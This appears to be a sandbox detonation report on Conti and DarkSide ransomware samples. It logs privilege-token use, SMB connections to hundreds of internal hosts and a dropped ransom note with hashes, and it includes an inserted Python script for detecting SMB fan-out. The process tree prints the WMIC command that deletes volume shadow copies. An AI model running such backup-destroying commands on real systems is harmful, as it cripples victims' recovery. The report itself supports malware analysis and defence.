N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{A958BAE6-B132-4B07-8587-5D3813184B5D}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{A958BAE6-B132-4B07-8587-5D3813184B5D}'" delete

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.255.49:445 tcp
N/A 10.127.255.5:445 tcp
N/A 10.127.255.25:445 tcp
N/A 10.127.255.33:445 tcp
N/A 10.127.255.51:445 tcp
N/A 10.127.255.54:445 tcp
N/A 10.127.255.23:445 tcp
N/A 10.127.255.50:445 tcp
N/A 10.127.255.14:445 tcp
N/A 10.127.255.1:445 tcp
N/A 10.127.255.18:445 tcp
N/A 10.127.255.7:445 tcp
N/A 10.127.255.8:445 tcp
N/A 10.127.255.16:445 tcp
N/A 10.127.255.37:445 tcp
N/A 10.127.255.190:445 tcp
N/A 10.127.255.46:445 tcp
N/A 10.127.255.6:445 tcp
N/A 10.127.255.38:445 tcp
N/A 10.127.255.39:445 tcp
N/A 10.127.255.42:445 tcp
N/A 10.127.255.17:445 tcp
N/A 10.127.255.29:445 tcp
N/A 10.127.255.43:445 tcp
N/A 10.127.255.60:445 tcp
N/A 10.127.255.47:445 tcp
N/A 10.127.255.31:445 tcp
N/A 10.127.255.61:445 tcp
N/A 10.127.255.32:445 tcp
N/A 10.127.255.44:445 tcp
N/A 10.127.255.26:445 tcp
N/A 10.127.255.40:445 tcp
N/A 10.127.255.56:445 tcp
N/A 10.127.255.15:445 tcp
N/A 10.127.255.12:445 tcp
N/A 10.127.255.24:445 tcp
N/A 10.127.255.41:445 tcp
N/A 10.127.255.28:445 tcp
N/A 10.127.255.36:445 tcp
N/A 10.127.255.3:445 tcp
N/A 10.127.255.30:445 tcp
N/A 10.127.255.9:445 tcp
N/A 10.127.255.2:445 tcp
N/A 10.127.255.45:445 tcp
N/A 10.127.255.53:445 tcp
N/A 10.127.255.57:445 tcp
N/A 10.127.255.4:445 tcp
N/A 10.127.255.11:445 tcp
N/A 10.127.255.21:445 tcp
N/A 10.127.255.22:445 tcp
N/A 10.127.255.27:445 tcp
N/A 10.127.255.55:445 tcp
N/A 10.127.255.0:445 tcp
N/A 10.127.255.10:445 tcp
N/A 10.127.255.58:445 tcp
N/A 10.127.255.19:445 tcp
N/A 10.127.255.62:445 tcp
N/A 10.127.255.20:445 tcp
N/A 10.127.255.63:445 tcp
N/A 10.127.255.35:445 tcp
N/A 10.127.255.34:445 tcp
N/A 10.127.255.52:445 tcp
N/A 10.127.255.59:445 tcp
N/A 10.127.255.13:445 tcp
N/A 10.127.255.64:445 tcp
N/A 10.127.255.48:445 tcp
N/A 10.127.255.80:445 tcp
N/A 10.127.255.116:445 tcp
N/A 10.127.255.75:445 tcp
N/A 10.127.255.91:445 tcp
N/A 10.127.255.103:445 tcp
N/A 10.127.255.123:445 tcp
N/A 10.127.255.82:445 tcp
N/A 10.127.255.94:445 tcp
N/A 10.127.255.129:445 tcp
N/A 10.127.255.114:445 tcp
N/A 10.127.255.122:445 tcp
N/A 10.127.255.124:445 tcp
N/A 10.127.255.85:445 tcp
N/A 10.127.255.68:445 tcp
N/A 10.127.255.69:445 tcp
N/A 10.127.255.86:445 tcp
N/A 10.127.255.99:445 tcp
N/A 10.127.255.117:445 tcp
N/A 10.127.255.101:445 tcp
N/A 10.127.255.113:445 tcp
N/A 10.127.255.110:445 tcp
N/A 10.127.255.74:445 tcp
N/A 10.127.255.127:445 tcp
N/A 10.127.255.84:445 tcp
N/A 10.127.255.125:445 tcp
N/A 10.127.255.87:445 tcp
N/A 10.127.255.66:445 tcp
N/A 10.127.255.107:445 tcp
N/A 10.127.255.121:445 tcp
N/A 10.127.255.96:445 tcp
N/A 10.127.255.70:445 tcp
N/A 10.127.255.81:445 tcp
N/A 10.127.255.90:445 tcp
N/A 10.127.255.100:445 tcp
N/A 10.127.255.105:445 tcp
N/A 10.127.255.95:445 tcp
N/A 10.127.255.93:445 tcp
N/A 10.127.255.72:445 tcp
N/A 10.127.255.104:445 tcp
N/A 10.127.255.65:445 tcp
N/A 10.127.255.97:445 tcp
N/A 10.127.255.106:445 tcp
N/A 10.127.255.73:445 tcp
N/A 10.127.255.98:445 tcp
N/A 10.127.255.126:445 tcp
N/A 10.127.255.128:445 tcp
N/A 10.127.255.92:445 tcp
N/A 10.127.255.115:445 tcp
N/A 10.127.255.108:445 tcp
N/A 10.127.255.88:445 tcp
N/A 10.127.255.79:445 tcp
N/A 10.127.255.89:445 tcp
N/A 10.127.255.119:445 tcp
N/A 10.127.255.102:445 tcp
N/A 10.127.255.109:445 tcp
N/A 10.127.255.112:445 tcp
N/A 10.127.255.120:445 tcp
N/A 10.127.255.67:445 tcp
N/A 10.127.255.76:445 tcp
N/A 10.127.255.71:445 tcp
N/A 10.127.255.77:445 tcp
N/A 10.127.255.192:445 tcp
N/A 10.127.255.78:445 tcp
N/A 10.127.255.83:445 tcp
N/A 10.127.255.118:445 tcp
N/A 10.127.255.111:445 tcp
N/A 10.127.255.176:445 tcp
N/A 10.127.255.137:445 tcp
N/A 10.127.255.165:445 tcp
N/A 10.127.255.141:445 tcp
N/A 10.127.255.154:445 tcp
N/A 10.127.255.131:445 tcp
N/A 10.127.255.193:445 tcp
N/A 10.127.255.180:445 tcp
N/A 10.127.255.188:445 tcp
N/A 10.127.255.195:445 tcp
N/A 10.127.255.132:445 tcp
N/A 10.127.255.162:445 tcp
N/A 10.127.255.179:445 tcp
N/A 10.127.255.157:445 tcp
N/A 10.127.255.185:445 tcp
N/A 10.127.255.196:445 tcp
N/A 10.127.255.149:445 tcp
N/A 10.127.255.164:445 tcp
N/A 10.127.255.171:445 tcp
N/A 10.127.255.173:445 tcp
N/A 10.127.255.142:445 tcp
N/A 10.127.255.183:445 tcp
N/A 10.127.255.138:445 tcp
N/A 10.127.255.151:445 tcp
N/A 10.127.255.174:445 tcp
N/A 10.127.255.169:445 tcp
N/A 10.127.255.182:445 tcp
N/A 10.127.255.146:445 tcp
N/A 10.127.255.172:445 tcp
N/A 10.127.255.175:445 tcp
N/A 10.127.255.177:445 tcp
N/A 10.127.255.140:445 tcp
N/A 10.127.255.143:445 tcp
N/A 10.127.255.156:445 tcp
N/A 10.127.255.136:445 tcp
N/A 10.127.255.145:445 tcp
N/A 10.127.255.184:445 tcp
N/A 10.127.255.187:445 tcp
N/A 10.127.255.148:445 tcp
N/A 10.127.255.130:445 tcp
N/A 10.127.255.181:445 tcp
N/A 10.127.255.139:445 tcp
N/A 10.127.255.152:445 tcp
N/A 10.127.255.170:445 tcp
N/A 10.127.255.163:445 tcp
N/A 10.127.255.155:445 tcp
N/A 10.127.255.189:445 tcp
N/A 10.127.255.160:445 tcp
N/A 10.127.255.194:445 tcp
N/A 10.127.255.186:445 tcp
N/A 10.127.255.144:445 tcp
N/A 10.127.255.166:445 tcp
N/A 10.127.255.135:445 tcp
N/A 10.127.255.134:445 tcp
N/A 10.127.255.147:445 tcp
N/A 10.127.255.133:445 tcp
N/A 10.127.255.150:445 tcp
N/A 10.127.255.158:445 tcp
N/A 10.127.255.178:445 tcp
N/A 10.127.255.191:445 tcp
N/A 10.127.255.167:445 tcp
N/A 10.127.255.161:445 tcp
N/A 10.127.255.168:445 tcp
N/A 10.127.255.153:445 tcp
N/A 10.127.255.159:445 tcp
N/A 10.127.255.214:445 tcp
N/A 10.127.255.228:445 tcp
N/A 10.127.255.201:445 tcp
N/A 10.127.255.246:445 tcp
N/A 10.127.255.207:445 tcp
N/A 10.127.255.236:445 tcp
N/A 10.127.255.203:445 tcp
N/A 10.127.255.244:445 tcp
N/A 10.127.255.247:445 tcp
N/A 10.127.255.204:445 tcp
N/A 10.127.255.208:445 tcp
N/A 10.127.255.212:445 tcp
N/A 10.127.255.205:445 tcp
N/A 10.127.255.243:445 tcp
N/A 10.127.255.254:445 tcp
N/A 10.127.255.233:445 tcp
N/A 10.127.255.238:445 tcp
N/A 10.127.255.226:445 tcp
N/A 10.127.255.239:445 tcp
N/A 10.127.255.237:445 tcp
N/A 10.127.255.229:445 tcp
N/A 10.127.255.198:445 tcp
N/A 10.127.255.230:445 tcp
N/A 10.127.255.245:445 tcp
N/A 10.127.255.200:445 tcp
N/A 10.127.255.242:445 tcp
N/A 10.127.255.231:445 tcp
N/A 10.127.255.209:445 tcp
N/A 10.127.255.210:445 tcp
N/A 10.127.255.211:445 tcp
N/A 10.127.255.215:445 tcp
N/A 10.127.255.252:445 tcp
N/A 10.127.255.225:445 tcp
N/A 10.127.255.253:445 tcp
N/A 10.127.255.241:445 tcp
N/A 10.127.255.220:445 tcp
N/A 10.127.255.250:445 tcp
N/A 10.127.255.213:445 tcp
N/A 10.127.255.248:445 tcp
N/A 10.127.255.199:445 tcp
N/A 10.127.255.217:445 tcp
N/A 10.127.255.227:445 tcp
N/A 10.127.255.222:445 tcp
N/A 10.127.255.216:445 tcp
N/A 10.127.255.251:445 tcp
N/A 10.127.255.223:445 tcp
N/A 10.127.255.249:445 tcp
N/A 10.127.255.218:445 tcp
N/A 10.127.255.197:445 tcp
N/A 10.127.255.224:445 tcp
N/A 10.127.255.235:445 tcp
N/A 10.127.255.206:445 tcp
N/A 10.127.255.202:445 tcp
N/A 10.127.255.232:445 tcp
N/A 10.127.255.219:445 tcp
N/A 10.127.255.234:445 tcp
N/A 10.127.255.221:445 tcp
N/A 10.127.255.240:445 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp
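The port-445 rows above are one detonation contacting hundreds of distinct internal hosts over SMB in two /24 ranges, which is the network shape of a ransomware encryptor enumerating shares for lateral encryption rather than normal workstation traffic. As an added example that is not part of the sandbox report, the following Python parses rows in the report's own "Country Destination Domain Proto" layout and flags SMB fan-out. The rows are a constructed subset copied from the table above so the script runs offline; the `min_targets` threshold is an assumed triage value, not something the report states.

```python
import re
from ipaddress import ip_address, ip_network
from typing import Dict, List

# Rows in the report's "Country Destination Domain Proto" layout. This is a
# constructed subset copied from the Network table above, so it runs offline.
SAMPLE_ROWS = """\
N/A 10.127.0.236:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.255.49:445 tcp
N/A 10.127.255.5:445 tcp
N/A 10.127.255.25:445 tcp
N/A 10.127.255.33:445 tcp
N/A 10.127.255.51:445 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
"""

# Country, IPv4:port, optional domain, protocol. The domain column is absent
# on the SMB rows, hence the optional group.
ROW_RE = re.compile(
    r"^(?P<country>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
    r"(?:\s+(?P<domain>\S+))?\s+(?P<proto>tcp|udp)$"
)


def parse_rows(text: str) -> List[Dict]:
    """Parse report rows; lines that do not match the layout are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        rows.append({
            "country": m.group("country"),
            "ip": ip_address(m.group("ip")),
            "port": int(m.group("port")),
            "domain": m.group("domain"),
            "proto": m.group("proto"),
        })
    return rows


def smb_fanout(rows: List[Dict], min_targets: int = 25) -> Dict:
    """Count distinct private hosts contacted on TCP/445 and the /24s they span.

    min_targets is an assumed triage threshold, not a value from the report;
    a workstation rarely opens SMB sessions to more than a handful of peers.
    """
    targets = {
        r["ip"] for r in rows
        if r["port"] == 445 and r["proto"] == "tcp" and r["ip"].is_private
    }
    subnets = sorted({str(ip_network(f"{ip}/24", strict=False)) for ip in targets})
    return {
        "smb_targets": len(targets),
        "subnets": subnets,
        "flagged": len(targets) >= min_targets,
    }


if __name__ == "__main__":
    # With the short constructed subset a lower threshold is used for the demo.
    print(smb_fanout(parse_rows(SAMPLE_ROWS), min_targets=8))
```

Run against the full table, the same function reports the two ranges 10.127.0.0/24 and 10.127.255.0/24 and a target count far above any sane threshold; the reverse-DNS and bing.com rows are ignored because they are neither port 445 nor private destinations.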

Files

C:\ProgramData\R3ADM3.txt

MD5 e6f001fc98cb51a0429ca5dc95f6a950
SHA1 16a73b95d0b5408fa95c97bc9f314f1eff4902b4
SHA256 acf1bb83790c25806dd3c29e0b453002397c7fe7abc25a3470ae4e3164f9f31b
SHA512 11e65ed0e80aedb497ab40edf5d3f756b121527cb1102408cdd9f146549c849a41a16fc908bb284c920b061c6b37723117b929de150a62cd61273c40e660168c

Analysis: behavioral22

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1699s

Max time network

1164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

Signatures

DarkSide

ransomware darkside

Renames multiple (164) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
